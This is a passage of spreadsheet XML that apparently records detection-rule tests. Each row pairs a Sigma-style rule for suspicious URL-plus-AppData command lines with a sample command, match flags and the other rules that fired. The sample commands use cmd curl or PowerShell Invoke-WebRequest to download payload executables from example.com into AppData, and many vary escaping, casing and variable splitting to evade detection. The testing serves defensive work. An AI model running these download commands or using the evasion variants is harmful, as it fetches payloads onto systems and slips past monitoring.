          <t>cmd.exe /C curl -O %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F1697" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1697" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1697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97" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1697" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1698" ht="15.75" customHeight="1" s="42">
      <c r="A1698" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1698" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1698" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1698" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1698" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F1698" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1698" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1698" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1698" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1698" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1699" ht="15.75" customHeight="1" s="42">
      <c r="A1699" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1699" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1699" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1699" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1699" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F1699" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1699" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1699" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1699" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1699" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1700" ht="15.75" customHeight="1" s="42">
      <c r="A1700" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1700" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1700" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1700" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1700" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl /"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F1700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1700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00" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1700" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1701" ht="15.75" customHeight="1" s="42">
      <c r="A1701" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1701" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1701" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1701" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1701" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F1701" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1701" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1701" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1701" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1701" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1702" ht="15.75" customHeight="1" s="42">
      <c r="A1702" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1702" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1702" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1702" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1702" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F1702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1702" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1702" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1702" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1703" ht="15.75" customHeight="1" s="42">
      <c r="A1703" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1703" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1703" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1703" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1703" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F1703" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1703" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1703" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1703" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1703" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1704" ht="15.75" customHeight="1" s="42">
      <c r="A1704" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1704" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1704" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1704" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1704" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnD "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F1704" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1704" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1704" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1704" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1704" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1705" ht="15.75" customHeight="1" s="42">
      <c r="A1705" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1705" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1705" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1705" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1705" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F1705" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1705" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1705" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1705" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1705" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1706" ht="15.75" customHeight="1" s="42">
      <c r="A1706" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1706" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1706" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1706" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1706" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F1706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1706" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1706" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1706" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1707" ht="15.75" customHeight="1" s="42">
      <c r="A1707" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1707" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1707" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1707" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1707" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F1707" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1707" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1707" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1707" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1707" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1708" ht="15.75" customHeight="1" s="42">
      <c r="A1708" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1708" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1708" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1708" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1708" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F1708" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1708" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1708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708" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1708" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1709" ht="15.75" customHeight="1" s="42">
      <c r="A1709" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1709" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1709" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1709" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1709" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F1709" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1709" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1709" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1709" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1709" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1710" ht="15.75" customHeight="1" s="42">
      <c r="A1710" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1710" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1710" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1710" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1710" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F1710" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1710" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1710" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1710" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1710" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1711" ht="15.75" customHeight="1" s="42">
      <c r="A1711" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1711" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1711" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1711" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1711" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F1711" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1711" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1711" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1711" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1711" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1712" ht="15.75" customHeight="1" s="42">
      <c r="A1712" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1712" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1712" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1712" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1712" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F1712" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1712" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1712" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1712" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1712" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1713" ht="15.75" customHeight="1" s="42">
      <c r="A1713" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1713" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1713" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1713" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1713" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F1713" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1713" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1713" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1713" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1713" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1714" ht="15.75" customHeight="1" s="42">
      <c r="A1714" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1714" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1714" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1714" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1714" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F1714" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1714" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1714" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1714" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1714" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1715" ht="15.75" customHeight="1" s="42">
      <c r="A1715" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1715" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1715" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1715" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1715" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F1715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1715" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1715" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1715" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1716" ht="15.75" customHeight="1" s="42">
      <c r="A1716" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1716" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1716" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1716" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1716" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F1716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1716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716" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1716" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1717" ht="15.75" customHeight="1" s="42">
      <c r="A1717" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1717" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1717" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1717" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1717" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F1717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1717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717" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1717" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1718" ht="15.75" customHeight="1" s="42">
      <c r="A1718" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1718" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1718" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1718" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1718" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F1718" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1718" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1718" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1718" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1718" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1719" ht="15.75" customHeight="1" s="42">
      <c r="A1719" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1719" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1719" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1719" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1719" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F1719" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1719" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1719" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1719" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1719" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1720" ht="15.75" customHeight="1" s="42">
      <c r="A1720" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1720" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
